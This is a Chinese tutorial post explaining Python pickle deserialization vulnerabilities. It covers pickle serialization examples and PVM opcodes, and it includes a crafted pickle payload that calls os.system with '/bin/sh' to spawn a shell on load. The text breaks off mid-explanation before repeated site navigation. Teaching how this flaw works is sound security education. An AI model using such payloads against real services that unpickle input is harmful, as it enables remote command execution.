一篇文章带你理解漏洞之Python反序列化漏洞!--688IT编程网

⼀篇⽂章带你理解漏洞之Python反序列化漏洞！

在分析了 PHP 的反序列化漏洞以后我打算将这个反序列化漏洞从语⾔层⾯进⾏扩展，然后我就看中了 python ，⽹上搜了⼀下，国内系统的讲 Python 反序列化漏洞的⽂章⽐较少，内容也是零零散散，于是我打算⾃⼰分析⼀下 Python 反序列化漏洞造成的命令执⾏和任意代码执⾏，然后弥补这个空缺。

0X01 Python 的序列化和反序列化是什么

Python 的序列化和反序列化是将⼀个类对象向字节流转化从⽽进⾏存储和传输，然后使⽤的时候再将字节流转化回原始的对象的⼀个过程。

1.⽤代码展⽰序列化和反序列化的过程：

为了看起来直观⼀些，我写了⼀个⽰例代码：

序列化⽰例代码：

import pickle

class People(object):

def __init__(self,name = "K0rz3n"):

self.name = name

def say(self):

print "Hello ! My friends"

a=People()

c=pickle.dumps(a)

print c

结果：

ccopy_reg

_reconstructor

(c__main__

people

c__builtin__

object

Ntp3

Rp4

(dp5

S'name'

S'K0rz3n'

sb.

先不要管这些乱七⼋糟的符号是什么(这是 PVM 虚拟机可以识别的有特殊含义的符号，我在后⾯会说)，我们先看⼀下我们认识的，可以清楚地看到我们对象的属性 name K0rz3n 我们对象所属的类 people 都已近存储在⾥⾯了，如果了解过 PHP 反序列化漏洞，你⼀定知道这和 PHP 的序列化的内容⼤同⼩异，因为 PHP 也是将类名和对象的属性序列化进去的。

反序列化⽰例代码：

import pickle

class People(object):

def __init__(self,name = "K0rz3n"):

self.name = name

def say(self):

print "Hello ! My friends"

a=People()

c=pickle.dumps(a)

d = pickle.loads(c)

d.say()

结果：

Hello ! My friends

可以看到，我们成功通过反序列化的⽅式恢复了之前我们序列化进去的类对象并成功的执⾏了对象的⽅法

注意：

如果我在反序列化以前删除了 People

这个类，那么我们在反序列化的过程中因为对象在当前的运⾏环境中没有到这个类就会报错，从⽽反序列化失败。⽰例代码：

import pickle

class People(object):

def __init__(self,name = "K0rz3n"):

self.name = name

def say(self):

print "Hello ! My friends"

a=People()

c=pickle.dumps(a)

del People

d = pickle.loads(c)

结果：

AttributeError: 'module' object has no attribute 'People'

2.⽤语⾔来描述序列化和反序列化的过程：

1.序列化过程：

(1)从对象提取所有属性，并将属性转化为名值对

(2)写⼊对象的类名

(3)写⼊名值对

2.反序列化过程：

(1)获取 pickle 输⼊流

(2)重建属性列表

(3)根据类名创建⼀个新的对象

(4)将属性复制到新的对象中

注意：

这个对象只要能在当前环境下创建起来就能完成反序列化，否则则不能实现对象的重构

0X02 为什么要实现序列化和反序列化

和其他语⾔的序列化⼀样，Python 的序列化的⽬的也是为了保存、传递和恢复对象的⽅便性，在众多传递对象的⽅式中，序列化和反序列化可以说是最简单和最容易试下的⽅式

0X03 python 是怎么实现序列化和反序列化的

1.⼏个重要的函数

Python 为我们提供了两个⽐较重要的库 pickle 和 cPickle（其中 cpickle 底层使⽤ c 语⾔书写，速度是pickle 的 1000倍，但是他们的调⽤接⼝是⼀样的，我这⾥就⼀ pickle 为例）以及⼏个⽐较重要的函数来实现序列化和反序列化

序列化：

pickle.dump(⽂件)

pickle.dumps(字符串)

反序列化:

pickle.load(⽂件)

pickle.loads(字符串)

但是底层是怎么实现的呢？这⾥就不得不提及 PVM(python 虚拟机) 了，它是实现 Python 序列化和反序列化的最根本的东西

2.PVM 的组成

PVM 由三个部分组成，引擎（或者叫指令分析器），栈区、还有⼀个 Memo (这个我也不知道怎么解释，我们姑且叫它“标签区“)

1.引擎的作⽤

从头开始读取流中的操作码和参数，并对其进⾏处理,zai在这个过程中改变栈区和标签区，处理结束后到达栈顶，形成并返回反序列化的对象

2.栈区的作⽤

作为流数据处理过程中的暂存区，在不断的进出栈过程中完成对数据流的反序列化，并最终在栈上⽣成发序列化的结果

3.标签区的作⽤

数据的⼀个索引或者标记

如图所⽰：

私信⼩编007即可获取是⼗套PDF以及⼤量的学习教程！

注意：PVM 指令的书写规范

(1)操作码是单字节的

(2)带参数的指令⽤换⾏符定界

3.PVM 操作码

为了表达的清楚完整我直接附上截图

这⾥⾯要重点关注⼏个

S : 后⾯跟的是字符串

( ：作为命令执⾏到哪⾥的⼀个标记

t ：将从 t 到标记的全部元素组合成⼀个元祖，然后放⼊栈中

c ：定义模块名和类名（模块名和类名之间使⽤回车分隔）

R ：从栈中取出可调⽤函数以及元祖形式的参数来执⾏，并把结果放回栈中

. ：点号是结束符（图中没有，这⾥补充）

4.反序列化流程

序列化就是⼀个将对象转化成字符串的过程，这个我们能直接使⽤ pickle 实现，这个过程我们也⽆需利⽤和分析，这⾥不做深究，我这⾥就是说⼀下如何进⾏的反序列化python怎么读的

我们将下⾯这个字符串存储为⼀个⽂件 shell.pickle

cos

system

(S'/bin/sh'

tR.

当我们使⽤下⾯这个函数对其进⾏加载的时候

>>> import pickle

>>> pickle.load(open('shell.pickle'))

执⾏结果如图所⽰：

可以看到成功返回了 sh 的 shell

我们现在来结合我们上⾯讲述的 PVM 的操作码看这个⽂件中的字符串是怎么⼀步⼀步执⾏的

(1)c 后⾯是模块名，换⾏后是类名，于是将 os.system 放⼊栈中

688IT编程网

一篇文章带你理解漏洞之Python反序列化漏洞!

发表评论

推荐文章

应用程序的安全检测方法、装置、电子设备和存储介质

nginx map用法正则

VBA之正则表达式(1)--基础篇

Prometheus监控学习笔记之初识PromQL

关于PHP中的webshell

热门文章

m函数数字提取

jest断言方法大全

中兴ZXSEC US 管理员手册

keras系列(一):参数设置

Qt从QString中提取出数字

element input 金额千分位格式化

freemaker 参数解析正则

C#正则验证数字

form表单验证正则

scanf正则表达式用法

grafana value的正则表达式

Android平台浮点数运算应用

js-(JS正则表达式验证数字)

判断Python输入是否是整数,字符,或浮点数

c语言 sscanf 正则规则

从文本中提取数值技巧

js将整数转换成两位浮点数的方法

vue正则限制浮点数

8到20的结尾的正则

shell 正则表达式最后一行

最新文章

应用程序的安全检测方法、装置、电子设备和存储介质

VBA之正则表达式(1)--基础篇

代码编辑的辅助方法、装置及电子设备

SHELL查字符串中包含字符的命令

String方法中replace和replaceAll的区别详解(源码分析)

双字节符号正则

标签列表

688IT编程网

一篇文章带你理解漏洞之Python反序列化漏洞!

发表评论

推荐文章

应用程序的安全检测方法、装置、电子设备和存储介质

nginx map用法 正则

VBA之正则表达式(1)--基础篇

Prometheus监控学习笔记之初识PromQL

关于PHP中的webshell

热门文章

m函数数字提取

jest断言方法大全

中兴ZXSEC US 管理员手册

keras系列(一):参数设置

Qt从QString中提取出数字

element input 金额千分位格式化

freemaker 参数解析正则

C#正则验证数字

form表单验证正则

scanf正则表达式用法

grafana value的正则表达式

Android平台浮点数运算应用

js-(JS正则表达式验证数字)

判断Python输入是否是整数,字符,或浮点数

c语言 sscanf 正则规则

从文本中提取数值技巧

js将整数转换成两位浮点数的方法

vue正则限制浮点数

8到20的结尾的正则

shell 正则表达式 最后一行

最新文章

应用程序的安全检测方法、装置、电子设备和存储介质

VBA之正则表达式(1)--基础篇

代码编辑的辅助方法、装置及电子设备

SHELL查字符串中包含字符的命令

String方法中replace和replaceAll的区别详解(源码分析)

双字节符号正则

标签列表

nginx map用法正则

shell 正则表达式最后一行